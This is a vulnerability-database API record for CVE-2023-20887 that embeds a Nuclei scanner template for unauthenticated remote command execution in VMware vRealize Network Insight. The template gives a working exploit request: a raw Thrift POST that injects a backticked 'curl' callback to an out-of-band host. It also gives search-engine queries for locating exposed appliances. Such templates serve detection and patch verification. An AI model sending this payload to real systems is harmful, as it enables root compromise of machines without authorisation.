{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-20887/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-20887/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-20887/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-20887/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-20887/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-20887"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-20887"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-20887.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-20887\n\ninfo:\n  name: VMware VRealize Network Insight - Remote Code Execution\n  author: sinsinology\n  severity: critical\n  description: |\n    VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n     vulnerable.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Apply the latest security patches provided by VMware to mitigate this vulnerability.\n  reference:\n    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n    - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/\n    - https://github.com/sinsinology/CVE-2023-20887\n    - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-20887\n    cwe-id: CWE-77\n    epss-score: 0.98281\n    epss-percentile: 0.99914\n    cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: vmware\n    product: vrealize_network_insight\n    shodan-query:\n      - title:\"VMware vRealize Network Insight\"\n      - http.title:\"vmware vrealize network insight\"\n      - http.title:\"vmware aria operations\"\n    fofa-query:\n      - title=\"VMware vRealize Network Insight\"\n      - title=\"vmware aria operations\"\n      - title=\"vmware vrealize network insight\"\n    google-query:\n      - intitle:\"vmware aria operations\"\n      - intitle:\"vmware vrealize network insight\"\n  tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev,vkev,vuln\nvariables:\n  cmd: \"curl {{interactsh-url}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /saas./resttosaasservlet HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-thrift\n\n        [1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{\"rec\":'\n\n      - type: word\n        part: header\n        words:\n          - \"application/x-thrift\"\n\n      - type: word\n        part: body\n        negative: true\n        words:\n          - \"Provided invalid node Id\"\n          - \"Invalid nodeId\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402203ca5c32294f034ceffd78dc8e0476a4dcab9ce6452e22e85e90814e493e6efe902207a3b2e98c6d6e451bddec074ff229f2fa8a7248c4aba89e5b7b37eb179e913c8:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-20887"
}